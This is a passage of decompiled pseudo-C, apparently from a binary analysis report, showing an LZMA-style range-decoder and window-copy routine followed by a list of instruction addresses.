												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406dc3
0x00406dc3
0x00406dc3
0x00406dc3
0x00406dc9
0x00406dcd
0x00406dd1
0x00406ddb
0x00406de9
0x004070bf
0x004070bf
0x004070c2
0x004070c9
0x004070f6
0x004070f6
0x004070fa
0x00000000
0x00000000
0x004070fc
0x00407105
0x0040710b
0x0040710e
0x00407111
0x00407114
0x00407117
0x0040711d
0x00407136
0x00407139
0x00407145
0x00407146
0x00407149
0x0040711f
0x0040711f
0x0040712e
0x00407131
0x00407131
0x00407153
0x004070f3
0x004070f3
0x004070f3
0x004070f6
0x004070fa
0x00000000
0x00000000
0x00000000
0x00407155
0x00407155
0x004070ce
0x004070d2
0x0040720a
0x0040720a
